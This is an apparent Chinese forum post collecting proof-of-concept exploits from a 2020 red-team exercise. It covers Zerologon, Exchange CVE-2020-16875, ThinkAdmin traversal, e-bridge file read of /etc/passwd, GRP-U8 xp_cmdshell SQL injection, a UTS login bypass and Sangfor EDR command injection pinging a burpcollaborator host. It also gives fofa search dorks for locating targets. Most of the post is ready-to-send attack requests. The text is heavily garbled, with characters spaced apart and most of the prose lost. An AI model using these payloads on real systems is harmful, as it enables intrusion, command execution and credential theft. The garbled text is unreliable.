[18139] 2020-09-19_2020HVV前一阶段漏洞情报总结

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2020-09-19_2020HVV前一阶段漏洞情报总结 2 0 2 0 H V V   H A C K   2 0 2 0 - 0 9 - 1 9 f r e e b u f N e t L o g o n   C V E - 2 0 2 0 - 1 4 7 2 : 2 0 2 0 8 1 1 2 0 2 0 8 C V E - 2 0 2 0 - 1 4 7 2 C V E - 2 0 2 0 - 1 4 7 2 N e t l o g o n   C V S S 1 0 . 0 N e t l o g o n 使 使 2 0 2 0 9 1 1   T o m   T e r v o o r t   G i t H u b P O C : 使   N e t l o g o n     ( M S - N R P C )     N e t l o g o n     M S - N R P C   访 : W i n d o w s   S e r v e r   2 0 0 8   R 2   f o r   x 6 4 - b a s e d   S y s t e m s   S e r v i c e   P a c k   1 W i n d o w s   S e r v e r   2 0 0 8   R 2   f o r   x 6 4 - b a s e d   S y s t e m s   S e r v i c e   P a c k   1   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r   2 0 1 2 W i n d o w s   S e r v e r   2 0 1 2   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r   2 0 1 2   R 2 W i n d o w s   S e r v e r   2 0 1 2   R 2   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r   2 0 1 6 W i n d o w s   S e r v e r   2 0 1 6   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r   2 0 1 9 W i n d o w s   S e r v e r   2 0 1 9   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r ,   v e r s i o n   1 9 0 3   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r ,   v e r s i o n   1 9 0 9   ( S e r v e r   C o r e   i n s t a l l a t i o n ) W i n d o w s   S e r v e r ,   v e r s i o n   2 0 0 4   ( S e r v e r   C o r e   i n s t a l l a t i o n ) : D C N e t b i o s - n s U N I Q U E _ N A M E S   =   {         b ' x 0 0 ' :   ' W o r k s t a t i o n   S e r v i c e ' ,         b ' x 0 3 ' :   ' M e s s e n g e r   S e r v i c e ' ,         b ' x 0 6 ' :   ' R A S   S e r v e r   S e r v i c e ' ,         b ' x 1 F ' :   ' N e t D D E   S e r v i c e ' ,         b ' x 2 0 ' :   ' S e r v e r   S e r v i c e ' ,         b ' x 2 1 ' :   ' R A S   C l i e n t   S e r v i c e ' ,         b ' x B E ' :   ' N e t w o r k   M o n i t o r   A g e n t ' ,         b ' x B F ' :   ' N e t w o r k   M o n i t o r   A p p l i c a t i o n ' ,         b ' x 1 D ' :   ' M a s t e r   B r o w s e r ' ,
        b ' x 1 B ' :   ' D o m a i n   M a s t e r   B r o w s e r ' , } G R O U P _ N A M E S   =   {         b ' x 0 0 ' :   ' D o m a i n   N a m e ' ,         b ' x 1 C ' :   ' D o m a i n   C o n t r o l l e r s ' ,         b ' x 1 E ' :   ' B r o w s e r   S e r v i c e   E l e c t i o n s ' , } d e f   n b n s _ n a m e ( a d d r ) :         m s g   =   ' '         d a t a   =   b ' f f x 0 0 x 0 0 x 0 0 x 0 1 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0   C K A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A x 0 0 x 0 0 ! x 0 0 x 0 1 '         t r y :                 s   =   s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T ,   s o c k e t . S O C K _ D G R A M )                 s . s e t t i m e o u t ( 2 )                 s . s e n d t o ( d a t a ,   ( a d d r ,   1 3 7 ) )                 r e p   =   s . r e c v ( 2 0 0 0 )                 i f   i s i n s t a n c e ( r e p ,   s t r ) :                         r e p   =   b y t e s ( r e p )                 n u m   =   o r d ( r e p [ 5 6 : 5 7 ] . d e c o d e ( ) )                 d a t a   =   r e p [ 5 7 : ]                 g r o u p ,   u n i q u e   =   ' ' ,   ' '                 m s g   + =   ' - - - - - - - - - - - - - - - - - - - - - - - - - - '   +   ' n '                 f o r   i   i n   r a n g e ( n u m ) :                         n a m e   =   d a t a [ 1 8   *   i : 1 8   *   i   +   1 5 ] . d e c o d e ( )                         f l a g _ b i t   =   b y t e s ( d a t a [ 1 8   *   i   +   1 5 : 1 8   *   i   +   1 6 ] )                         i f   f l a g _ b i t   i n   G R O U P _ N A M E S   a n d   f l a g _ b i t   ! =   b ' x 0 0 ' :     #   G   T O D O                                 m s g   + =   ' % s t % s t % s '   %   ( n a m e ,   ' G ' ,   G R O U P _ N A M E S [ f l a g _ b i t ] )   +   ' n '                                 p a s s                         e l i f   f l a g _ b i t   i n   U N I Q U E _ N A M E S   a n d   f l a g _ b i t   ! =   b ' x 0 0 ' :     #   U                                 m s g   + =   ' % s t % s t % s '   %   ( n a m e ,   ' U ' ,   U N I Q U E _ N A M E S [ f l a g _ b i t ] )   +   ' n '                                 p a s s                         e l i f   f l a g _ b i t   i n   b ' x 0 0 ' :                                 n a m e _ f l a g s   =   d a t a [ 1 8   *   i   +   1 6 : 1 8   *   i   +   1 8 ]                                 i f   o r d ( n a m e _ f l a g s [ 0 : 1 ] )   > =   1 2 8 :                                         g r o u p   =   n a m e . s t r i p ( )                                         m s g   + =   ' % s t % s t % s '   %   ( n a m e ,   ' G ' ,   G R O U P _ N A M E S [ f l a g _ b i t ] )   +   ' n '                                 e l s e :                                         u n i q u e   =   n a m e                                         m s g   + =   ' % s t % s t % s '   %   ( n a m e ,   ' U ' ,   U N I Q U E _ N A M E S [ f l a g _ b i t ] )   +   ' n '                         e l s e :                                 m s g   + =   ' % s t - t - '   %   n a m e   +   ' n '                                 p a s s                 m s g   + =   ' - - - - - - - - - - - - - - - - - - - - - - - - - - '   +   ' n '                 m s g   =   ' % s % s '   %   ( g r o u p ,   u n i q u e )   +   ' n '   +   m s g                 r e t u r n   ( { ' g r o u p ' :   g r o u p ,   ' u n i q u e ' :   u n i q u e ,   ' m s g ' :   m s g } , u n i q u e . s t r i p ( ) )         e x c e p t   s o c k e t . e r r o r   a s   e :                 r e t u r n   F a l s e i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         a d d r   =   " x x x x "         i n f o   =   n b n s _ n a m e ( a d d r )         p r i n t ( " N e t b i o s   C o m p u t e r   N a m e   : { } " . f o r m a t ( i n f o [ " c o m p u t e r _ n a m e " ] ) )
使   h t t p s : / / g i t h u b . c o m / S e c u r a B V / C V E - 2 0 2 0 - 1 4 7 2 : 使 W i n d o w s   U p d a t e h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - U S / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 4 7 2 : W i n d o w s   : 1 .   w s c u i . c p l 2 . 3 . ( )     M i c r o s o f t   E x c h a n g e C V E - 2 0 2 0 - 1 6 8 7 5 : c m d l e t M i c r o s o f t   E x c h a n g e 使 E x c h a n g e   S e r v e r S Y S T E M : M i c r o s o f t   E x c h a n g e   S e r v e r   2 0 1 6   C u m u l a t i v e   U p d a t e   1 6 M i c r o s o f t   E x c h a n g e   S e r v e r   2 0 1 6   C u m u l a t i v e   U p d a t e   1 7 M i c r o s o f t   E x c h a n g e   S e r v e r   2 0 1 9   C u m u l a t i v e   U p d a t e   5 M i c r o s o f t   E x c h a n g e   S e r v e r   2 0 1 9   C u m u l a t i v e   U p d a t e   6 : M S F 线 C V E - 2 0 2 0 - 1 6 8 7 5 p y t h o n 3   z e r o l o g o n _ t e s t e r . p y   M A S T E R D C   x x x . x x . x x . x x
h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / p u l l / 1 4 1 2 6 : E x c h a n g e   S e r v e r h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / e x c h a n g e / n e w - f e a t u r e s / b u i l d - n u m b e r s - a n d - r e l e a s e - d a t e s ? v i e w = e x c h s e r v e r - 2 0 1 9 h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - U S / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 6 8 7 5 : h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / z h - c n / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 6 8 7 5 T h i n k a d m i n   v 6 C V E - 2 0 2 0 - 2 5 5 4 0 : T h i n k A d m i n T h i n k P H P T h i n k A d m i n   6 G E T : T h i n k a d m i n     2 0 2 0 . 0 8 . 0 3 . 0 1 : f o f a _ d o r k :   T h i n k A d m i n   & &   t i t l e = =   ·   T h i n k A d m i n P O C : P O S T   / a d m i n . h t m l ? s = a d m i n / a p i . U p d a t e / n o d e   H T T P / 1 . 1 H o s t :   x x x x x x A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n U s e r - A g e n t :   M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W i n 6 4 ;   x 6 4 ;   T r i d e n t / 5 . 0 ) C o n n e c t i o n :   c l o s e C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   2 2 r u l e s = % 5 B % 2 2 . % 2 F % 2 2 % 5 D
: : h t t p s : / / g i t h u b . c o m / z o u j i n g l i / T h i n k A d m i n / b l o b / v 6 / a p p / a d m i n / c o n t r o l l e r / a p i / U p d a t e . p h p U p d a t e . p h p : : h t t p s : / / g i t h u b . c o m / z o u j i n g l i / T h i n k A d m i n / i s s u e s / 2 4 4 e - b r i d g e   / : O A 0 A e - b r i d g e     / w x j s a p i / s a v e Y Z J F i l e   / f i l e / f i l e N o L o g i n / { i d } :   2 0 1 8 - 2 0 1 9   : f o f a _ d o r k   :   h t t p s : / / x x x x x / a d m i n . h t m l ? s = a d m i n / a p i . U p d a t e / v e r s i o n h t t p : / / x x x x x x / w x j s a p i / s a v e Y Z J F i l e ? f i l e N a m e = t e s t & d o w n l o a d U r l = f i l e : / / / e t c / p a s s w d & f i l e E x t = t x t
i d / f i l e / f i l e N o L o g i n / { i d }     w i n d o w s c : / / w i n d o w s / w i n . i n i L i n u x e t c / p a s s w d : G R P - U 8 S Q L : 1 9 8 8 / E R P E R P G R P - U 8 S Q L : h t t p : / / x x x x x x / w x j s a p i / s a v e Y Z J F i l e ? f i l e N a m e = t e s t & d o w n l o a d U r l = f i l e : / / / e t c / p a s s w d & f i l e E x t = t x t p a t h s   =   {             " l i n u x " : " / w x j s a p i / s a v e Y Z J F i l e ? f i l e N a m e = t e s t & d o w n l o a d U r l = f i l e : / / / e t c / p a s s w d & f i l e E x t = t x t " ,             " w i n d o w s " : " / w x j s a p i / s a v e Y Z J F i l e ? f i l e N a m e = t e s t & d o w n l o a d U r l = f i l e : / / / c : / / w i n d o w s / w i n . i n i & f i l e E x t = t x t " }
f o f a _ d o r k :   G R P - u 8 P O C : m d 5 p o c 使 M S S Q L   x p _ c m d s h e l l : C N V D - 2 0 1 9 - 2 0 8 3 5 : 2 0 1 9 C N V D C N V D - 2 0 1 9 - 2 0 8 3 5 f o f a _ d o r k :   b o d y = : : h t t p s : / / w w w . s h u z h i d u o . c o m / A / V x 5 M Z k j 3 d N / #   P O S T   / P r o x y   H T T P / 1 . 1 A c c e p t :   A c c e p t :   * / * C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d U s e r - A g e n t :   M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   6 . 0 ; ) H o s t :   h o s t C o n t e n t - L e n g t h :   3 5 7 C o n n e c t i o n :   K e e p - A l i v e C a c h e - C o n t r o l :   n o - c a c h e c V e r = 9 . 8 . 0 & d p = < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " G B 2 3 1 2 " ? > < R 9 P A C K E T   v e r s i o n = " 1 " > < D A T A F O R M A T > X M L < / D A T A F O R M A T > < R 9 F U N C T I O N > < N A M E > A S _ D a t a R e q u e s t < / N A M E > < P A R A M S > < P A R A M > < N A M E > P r o v i d e r N a m e < / N A M E > < D A T A f o r m a t = " t e x t " > D a t a S e t P r o v i d e r D a t a < / D A T A > < / P A R A M > < P A R A M > < N A M E > D a t a < / N A M E > < D A T A   f o r m a t = " t e x t " > e x e c   x p _ c m d s h e l l   ' n e t   u s e r ' < / D A T A > < / P A R A M > < / P A R A M S > < / R 9 F U N C T I O N > < / R 9 P A C K E T >
h t t p s : / / w w w . c n v d . o r g . c n / f l a w / s h o w / 1 6 3 2 2 0 1 绿 绿 U T S : 绿 V 2 . 0 R 0 0 F 0 2 S P 0 2 : < V 2 . 0 R 0 0 F 0 2 S P 0 2 : f o f a _ d o r k :   U T S 使 a d m i n 使 b u r p s u i t e { s t a t u s : f a l s e   { s t a t u s : t r u e a d m i n M D 5 使 M D 5 : h t t p : / / u p d a t e . n s f o c u s . c o m / u p d a t e / l i s t B s a U t s D e t a i l / v / F 0 2 : 绿 0 d a y
: 2 0 2 0 8 1 7 9 1 1 0 d a y : : 2 0 2 0 8 1 7
E D R : E D R : < 3 . 2 . 2 1 : p o c : P O S T   / a p i / e d r / s a n g f o r i n t e r / v 2 / c s s p / s l o g _ c l i e n t ? t o k e n = e y J t Z D U i O n R y d W V 9   H T T P / 1 . 1 H o s t :   x x . x x x . x x . 1 7 : 9 4 4 3 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 3 2 . 0 . 1 7 0 0 . 7 6   S a f a r i / 5 3 7 . 3 6 C o n t e n t - L e n g t h :   8 9 C o n n e c t i o n :   c l o s e { " p a r a m s " :   " w = 1 " ' t e s t ' " | p i n g   n 5 t c b k d c g f 8 h l j 7 x j c 7 5 7 8 y a u 1 0 s o h . b u r p c o l l a b o r a t o r . n e t " }
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则